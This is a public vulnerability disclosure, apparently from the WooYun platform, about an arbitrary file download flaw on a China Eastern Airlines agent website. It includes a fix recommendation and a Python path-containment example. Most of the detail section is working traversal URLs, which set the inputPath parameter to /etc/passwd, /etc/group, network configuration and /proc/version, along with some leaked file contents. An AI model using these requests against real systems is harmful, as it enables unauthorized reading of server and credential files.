Vulnerability summary
Defect ID: wooyun-2013-040171
Title: File traversal on a China Eastern Airlines site allows an important system to be downloaded
Vendor: China Eastern Airlines Co., Ltd.
Author: 霍大然
Submitted: 2013-10-18 13:25
Fixed: 2013-12-02 13:26
Published: 2013-12-02 13:26
Vulnerability type: Arbitrary file traversal/download
Severity: High
Self-assessed Rank: 11
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2013-10-18: Details reported to the vendor, awaiting vendor handling
2013-10-18: Vendor confirmed; details disclosed to the vendor only
2013-10-28: Details disclosed to core white hats and domain experts
2013-11-07: Details disclosed to regular white hats
2013-11-17: Details disclosed to intern white hats
2013-12-02: Details disclosed to the public
Brief description:
File traversal on a China Eastern Airlines site allows an important system to be downloaded
Detailed description:
Affected site:
http://ceagent.ceair.com/
1. passwd file
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/passwd
Lots of users;
2. sysctl
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysctl.conf
3. group
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/group
4. Network information:
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=eth0
ONBOOT=yes
USERCTL=no
BOOTPROTO=static
NETMASK=255.255.255.0
IPADDR=10.6.141.90
PEERDNS=yes
check_link_down() {
return 1;
}
5. services
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/services
Proof of vulnerability:
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/proc/version
Linux version 2.6.18-128.el5 (mockbuild@hs20-bc1-7.build.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-44)) #1 SMP Wed Dec 17 11:41:38 EST 2008
Fix recommendation:
Filter input to the vulnerable parameter (inputPath).
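As an added example (not code from this report or from the vendor's application), the containment check that filtering inputPath should enforce: the client value is joined onto a fixed download root, normalized, and rejected unless the result still lies inside that root. The root directory and function names are assumptions for illustration.

```python
import os
import posixpath

# Assumed directory the download action is meant to serve (constructed value).
DOWNLOAD_ROOT = "/srv/ceagent/downloads"


class UnsafePathError(ValueError):
    """Raised when a client-supplied path would escape the download root."""


def resolve_download_path(input_path: str, root: str = DOWNLOAD_ROOT) -> str:
    """Map the untrusted inputPath value onto a file inside root (lexical check).

    Rejects empty values, NUL bytes, absolute paths such as /etc/passwd, and any
    '..' sequence that climbs above root. Containment is verified on the normalized
    result with a separator, so '/srv/x2/f' is not accepted for root '/srv/x'.
    """
    if not input_path or "\x00" in input_path:
        raise UnsafePathError("empty path or embedded NUL byte")
    if posixpath.isabs(input_path):
        raise UnsafePathError("absolute paths are not allowed")
    root_norm = posixpath.normpath(root)
    full = posixpath.normpath(posixpath.join(root_norm, input_path))
    if full == root_norm:
        raise UnsafePathError("a file name is required")
    if not full.startswith(root_norm + "/"):
        raise UnsafePathError("path escapes the download root")
    return full


def resolve_on_disk(input_path: str, root: str = DOWNLOAD_ROOT) -> str:
    """Lexical check plus symlink resolution on the real filesystem.

    A symlink inside root that points at /etc passes the lexical check but is
    caught here, because realpath() follows it before the containment test.
    """
    lexical = resolve_download_path(input_path, root)
    real_root = os.path.realpath(root)
    real_full = os.path.realpath(lexical)
    if os.path.commonpath([real_root, real_full]) != real_root:
        raise UnsafePathError("symlink escapes the download root")
    return real_full


def is_allowed(input_path: str, root: str = DOWNLOAD_ROOT) -> bool:
    """True if the lexical check accepts input_path, False otherwise."""
    try:
        resolve_download_path(input_path, root)
        return True
    except UnsafePathError:
        return False
```

In the handler, call resolve_on_disk() and open only the path it returns; never open the raw parameter.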
Copyright notice: when reposting, please credit 霍大然@乌云
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2013-10-18 16:50
Vendor reply:
Many thanks.
Latest status:
2013-10-21: Fixed.